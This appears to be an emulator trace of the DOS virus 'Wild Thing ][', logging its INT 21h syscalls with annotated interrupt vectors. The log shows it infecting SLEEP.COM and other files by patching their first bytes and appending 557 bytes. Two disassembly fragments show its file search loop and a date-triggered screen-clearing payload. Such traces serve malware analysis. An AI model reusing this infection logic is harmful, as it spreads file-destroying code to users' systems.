2018-12-25T11:45:52.443996238Z 48 PC: c609 | Get DOS version
2018-12-25T11:45:52.447624931Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:45:52.450199891Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:45:52.453215883Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:45:52.457025903Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:52.46139596Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:52.466776469Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:45:52.478046528Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:45:52.479403402Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:45:52.481770735Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:45:52.505164964Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:45:52.509160212Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
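2018-12-25T11:45:52.511445148Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file'; the AKA text is the name of INT 21h function 19, not of the vector: read as decimal like the op column, vector 19 is INT 13h, BIOS disk services)
2018-12-25T11:45:52.513011695Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file'; as above, vector 13h, BIOS disk services)
2018-12-25T11:45:52.514562551Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address'; likewise an INT 21h function name: vector 47 decimal is INT 2Fh, the multiplex interrupt)
2018-12-25T11:45:52.516857171Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address'; as above, vector 2Fh, the multiplex interrupt)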
2018-12-25T11:45:52.518419873Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:45:52.527627691Z 62 PC: 8f8eb | Close file
2018-12-25T11:45:52.530933075Z 62 PC: 8f8f2 | Close file
2018-12-25T11:45:52.533204685Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.535068701Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.538366478Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.540315957Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.542287715Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.546543942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.548147912Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.54966606Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.551640942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.553332007Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.555018188Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.557002006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.558800603Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.560388897Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.56248938Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.564075781Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.565625308Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.567893971Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.569516009Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.571056188Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.572813614Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.574772228Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.576308184Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.577939316Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.580335293Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.581876282Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.583556192Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.585422322Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.587301386Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:52.588863675Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:45:52.594272198Z 62 PC: 8f90e | Close file
2018-12-25T11:45:52.595926952Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:45:52.597728859Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:45:52.600103298Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:45:52.605629173Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:45:52.606838992Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:45:52.612452088Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:45:52.614216741Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:45:52.615699056Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:45:52.618244886Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:45:52.619924315Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:45:52.621424621Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:45:52.623469877Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:45:52.625043109Z 73 PC: 8fa11 | Release memory
2018-12-25T11:45:52.626611758Z 73 PC: 8efea | Release memory
2018-12-25T11:45:52.628052976Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:45:52.629691237Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:45:52.63155094Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:45:52.633158979Z 73 PC: 8f060 | Release memory
2018-12-25T11:45:52.634538955Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:45:52.644370798Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:52.65145784Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:45:52.653501054Z 62 PC: 8f0d1 | Close file
2018-12-25T11:45:52.656003647Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:45:52.682272164Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:45:52.683574063Z 48 PC: 12bee | Get DOS version
2018-12-25T11:45:52.685695592Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:45:52.688866017Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:45:52.690284672Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:45:52.691459111Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:45:52.694000028Z 72 PC: 1355d | Allocate memory
2018-12-25T11:45:52.696434161Z 25 PC: 13596 | Get default drive
2018-12-25T11:45:52.697987998Z 71 PC: 135ad | Get current directory
2018-12-25T11:45:52.701410204Z 59 PC: 135ba | Change current directory
2018-12-25T11:45:52.707742225Z 59 PC: 135c8 | Change current directory
2018-12-25T11:45:52.715814355Z 59 PC: 135d3 | Change current directory
2018-12-25T11:45:52.72233704Z 25 PC: 12d13 | Get default drive
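2018-12-25T11:45:52.724104572Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write'; the AKA text is the name of INT 21h function 34, not of the vector: read as decimal like the op column, vector 34 is INT 22h, the terminate address)
2018-12-25T11:45:52.725695012Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records'; likewise an INT 21h function name: vector 35 decimal is INT 23h, the Ctrl-Break handler)
2018-12-25T11:45:52.727811621Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number'; likewise an INT 21h function name: vector 36 decimal is INT 24h, the critical-error handler)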
2018-12-25T11:45:52.730325004Z 80 PC: 1301d | Set current PSP
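2018-12-25T11:45:52.731185302Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag'; the AKA text is the name of INT 21h function 46, not of the vector: read as decimal like the op column, vector 46 is INT 2Eh, the command-interpreter entry point)
2018-12-25T11:45:52.733180232Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address'; likewise an INT 21h function name: vector 47 decimal is INT 2Fh, the multiplex interrupt)
2018-12-25T11:45:52.734359898Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address'; as above, vector 2Fh, the multiplex interrupt)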
2018-12-25T11:45:52.735480384Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:45:52.73784721Z 72 PC: 130ec | Allocate memory
2018-12-25T11:45:52.739691742Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:45:52.747156679Z 62 PC: 131ba | Close file
2018-12-25T11:45:52.750091369Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:45:52.751253081Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:45:52.752936771Z 72 PC: 11991 | Allocate memory
2018-12-25T11:45:52.755574965Z 73 PC: 119b2 | Release memory
2018-12-25T11:45:52.757108943Z 72 PC: 119bd | Allocate memory
2018-12-25T11:45:52.75877092Z 73 PC: 119df | Release memory
2018-12-25T11:45:52.760773496Z 72 PC: 119f5 | Allocate memory
2018-12-25T11:45:52.762779793Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":2417,"SideJobID":0}


Syscalls:

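Time | Syscall Op (INT 21h function number from AH, in decimal; e.g. 71 = 47h) | PC (address of the instruction after the INT) | Syscall Name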
2018-12-25T11:45:48.805546331Z 26 PC: 12f84 | Set disk transfer address
2018-12-25T11:45:48.806989505Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32e], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x34a]
0x12e5b: int 0x21
0x12e5d: call 0x12f46
0x12e60: call 0x12f6a
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2cb]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a8]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2e1]
0x12e7f: mov ah, 0x3b
2018-12-25T11:45:48.809301994Z 71 PC: 12e5d | Get current directory
2018-12-25T11:45:48.812320516Z 42 PC: 12f4a | Get date 0x12f4a: cmp al, 5
0x12f4c: je 0x12f4f
0x12f4e: ret
0x12f4f: mov ah, 1
0x12f51: mov cx, 0x2020
0x12f54: int 0x10
0x12f56: mov ah, 2
0x12f58: xor dx, dx
0x12f5a: int 0x10
0x12f5c: xor ax, ax
0x12f5e: int 0x10
0x12f60: mov ah, 9
0x12f62: lea dx, word ptr [bp + 0x271]
0x12f66: int 0x21
0x12f68: jmp 0x12f68
0x12f6a: mov ah, 0x4e
0x12f6c: lea dx, word ptr [bp + 0x2d1]
0x12f70: mov cx, 7
0x12f73: int 0x21
0x12f75: jae 0x12f78
2018-12-25T11:45:48.815040087Z 78 PC: 12f75 | Find first file
2018-12-25T11:45:48.821682577Z 78 PC: 12e6e | Find first file
2018-12-25T11:45:48.834090336Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T11:45:48.840612124Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T11:45:50.515938758Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:45:50.52440665Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T11:45:50.526531079Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:45:50.534484113Z 66 PC: 12f45 | Move file pointer
2018-12-25T11:45:50.536217866Z 64 PC: 12f17 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:45:50.539245131Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.54170992Z 64 PC: 13068 | Write file or device (Write 557 bytes on handle 5)
2018-12-25T11:45:50.551036122Z 87 PC: 12f2c | Get or set file date and time
2018-12-25T11:45:50.55329343Z 62 PC: 12f30 | Close file
2018-12-25T11:45:50.563078526Z 67 PC: 12f3a | Get or set file attributes
2018-12-25T11:45:50.569926671Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.572351761Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.576912324Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.588368715Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.595884511Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.597839093Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.605578068Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.607695069Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.6114261Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.614161598Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.624885604Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.626717085Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.636303676Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.647705736Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.651081653Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.658994519Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.670526058Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.678280171Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.680328454Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.687279778Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.688791033Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.69134397Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.69269687Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.698490429Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.700243729Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.708688591Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.71920815Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.722000806Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.728154552Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.734386691Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.741781617Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.743696957Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.750393283Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.752461318Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.755624053Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.757317861Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.765895834Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.767984192Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.776584484Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.786868512Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.789728447Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.793648453Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.799985123Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.808004763Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.809519146Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.816734131Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.818980905Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.821725688Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.823372701Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.832860186Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.834542606Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.842712268Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.853066825Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.856382574Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.862504252Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.872818412Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.88590435Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.887312311Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.894155174Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.896784462Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.9008395Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.902952441Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.913267461Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.914961895Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.923010534Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:50.933383888Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:50.939911132Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:50.946627549Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:50.956948511Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:50.964435211Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:50.965820251Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:50.972592811Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.974712161Z 64 PC: 12f17 | Write file or device (See above)
2018-12-25T11:45:50.977625628Z 66 PC: 12f45 | Move file pointer (See above)
2018-12-25T11:45:50.979559183Z 64 PC: 13068 | Write file or device (See above)
2018-12-25T11:45:50.98916533Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:50.990712319Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:50.998820998Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:51.01067887Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:51.013409155Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T11:45:51.019469337Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T11:45:51.031319898Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T11:45:51.038695158Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T11:45:51.040226244Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T11:45:51.047758058Z 87 PC: 12f2c | Get or set file date and time (See above)
2018-12-25T11:45:51.049314801Z 62 PC: 12f30 | Close file (See above)
2018-12-25T11:45:51.056788366Z 67 PC: 12f3a | Get or set file attributes (See above)
2018-12-25T11:45:51.069744122Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T11:45:51.073218665Z 59 PC: 12e83 | Change current directory
2018-12-25T11:45:51.078857488Z 59 PC: 12e8d | Change current directory
2018-12-25T11:45:51.080888967Z 26 PC: 12f84 | Set disk transfer address (See above)
2018-12-25T11:45:51.082732657Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T11:45:53.281737639Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T11:45:53.284048049Z 72 PC: 8f1bd | Allocate memory
2018-12-25T11:45:53.288165314Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T11:45:53.291271701Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T11:45:53.303048398Z 66 PC: 91f95 | Move file pointer
2018-12-25T11:45:53.304915381Z 62 PC: 91fc1 | Close file
2018-12-25T11:45:53.307299606Z 75 PC: 91fe0 | Execute program
2018-12-25T11:45:53.325248167Z 98 PC: 916f1 | Get current PSP
2018-12-25T11:45:53.32709732Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T11:45:53.331844205Z 48 PC: c609 | Get DOS version
2018-12-25T11:45:53.335256467Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T11:45:53.337910693Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T11:45:53.340192853Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T11:45:53.344452454Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:53.348433009Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T11:45:53.354223775Z 61 PC: 91f88 | Open file (See above)
2018-12-25T11:45:53.365594974Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T11:45:53.367054776Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T11:45:53.369269335Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T11:45:53.392897618Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T11:45:53.39689469Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
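2018-12-25T11:45:53.398357061Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file') [vector 19 decimal is INT 13h, BIOS disk services; 'Delete file' is the INT 21h function with the same number, not this vector]
2018-12-25T11:45:53.399700251Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file') [INT 13h]
2018-12-25T11:45:53.400725622Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address') [vector 47 decimal is INT 2Fh, the multiplex interrupt; the AKA text is again an INT 21h function name]
2018-12-25T11:45:53.402531443Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address') [INT 2Fh]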
2018-12-25T11:45:53.403825446Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T11:45:53.412224849Z 62 PC: 8f8eb | Close file
2018-12-25T11:45:53.414510243Z 62 PC: 8f8f2 | Close file
2018-12-25T11:45:53.416179213Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.417495039Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.419800649Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.421463999Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.422924774Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.427933761Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.429567258Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.431066884Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.432839657Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.434328614Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.435786259Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.437799487Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.439254634Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.440614231Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.442588343Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.4440935Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.445546415Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.44791953Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.449357982Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.450636082Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.452282321Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.453725309Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.455284785Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.457011988Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.458450685Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.459775958Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.461605967Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.463356804Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.465001426Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T11:45:53.467109058Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T11:45:53.472284488Z 62 PC: 8f90e | Close file
2018-12-25T11:45:53.474125471Z 69 PC: 8f915 | Duplicate handle
2018-12-25T11:45:53.476594752Z 69 PC: 8f919 | Duplicate handle
2018-12-25T11:45:53.478268233Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T11:45:53.483973774Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T11:45:53.500272912Z 61 PC: 9387b | Open file (See above)
2018-12-25T11:45:53.505279602Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T11:45:53.506988151Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T11:45:53.508972389Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T11:45:53.510849126Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T11:45:53.512384933Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T11:45:53.514289754Z 72 PC: 8fa02 | Allocate memory
2018-12-25T11:45:53.516039678Z 72 PC: 8fa06 | Allocate memory
2018-12-25T11:45:53.517942169Z 73 PC: 8fa11 | Release memory
2018-12-25T11:45:53.519898885Z 73 PC: 8efea | Release memory
2018-12-25T11:45:53.521285615Z 74 PC: 8f003 | Reallocate memory
2018-12-25T11:45:53.522860223Z 72 PC: 8f054 | Allocate memory
2018-12-25T11:45:53.525159188Z 72 PC: 8f058 | Allocate memory
2018-12-25T11:45:53.526667253Z 73 PC: 8f060 | Release memory
2018-12-25T11:45:53.527820734Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T11:45:53.53780579Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:45:53.543972728Z 66 PC: 8f0ad | Move file pointer
2018-12-25T11:45:53.545735858Z 62 PC: 8f0d1 | Close file
2018-12-25T11:45:53.548190832Z 75 PC: 8f0f2 | Execute program
2018-12-25T11:45:53.572152515Z 80 PC: 12be9 | Set current PSP
2018-12-25T11:45:53.573452187Z 48 PC: 12bee | Get DOS version
2018-12-25T11:45:53.576363092Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T11:45:53.579104507Z 101 PC: 12c74 | Get extended country info
2018-12-25T11:45:53.580563882Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T11:45:53.582769069Z 74 PC: 12cdc | Reallocate memory
2018-12-25T11:45:53.584516382Z 72 PC: 1355d | Allocate memory
2018-12-25T11:45:53.586274561Z 25 PC: 13596 | Get default drive
2018-12-25T11:45:53.588269332Z 71 PC: 135ad | Get current directory
2018-12-25T11:45:53.590978685Z 59 PC: 135ba | Change current directory
2018-12-25T11:45:53.596869368Z 59 PC: 135c8 | Change current directory
2018-12-25T11:45:53.604786639Z 59 PC: 135d3 | Change current directory
2018-12-25T11:45:53.608974525Z 25 PC: 12d13 | Get default drive
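2018-12-25T11:45:53.610676821Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write') [vector 34 decimal is INT 22h, the terminate address; the AKA text is the INT 21h function with the same number, not this vector]
2018-12-25T11:45:53.612678545Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records') [vector 35 decimal is INT 23h, the Ctrl-Break handler]
2018-12-25T11:45:53.613934628Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number') [vector 36 decimal is INT 24h, the critical error handler]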
2018-12-25T11:45:53.616686745Z 80 PC: 1301d | Set current PSP
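2018-12-25T11:45:53.618549879Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag') [vector 46 decimal is INT 2Eh, the command-interpreter entry; the AKA text is the INT 21h function with the same number, not this vector]
2018-12-25T11:45:53.620303543Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address') [vector 47 decimal is INT 2Fh, the multiplex interrupt]
2018-12-25T11:45:53.621939456Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address') [INT 2Fh]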
2018-12-25T11:45:53.62456204Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T11:45:53.626765248Z 72 PC: 130ec | Allocate memory
2018-12-25T11:45:53.628712987Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T11:45:53.635981737Z 62 PC: 131ba | Close file
2018-12-25T11:45:53.639007172Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T11:45:53.640130415Z 74 PC: 1197c | Reallocate memory
2018-12-25T11:45:53.644196125Z 72 PC: 11991 | Allocate memory
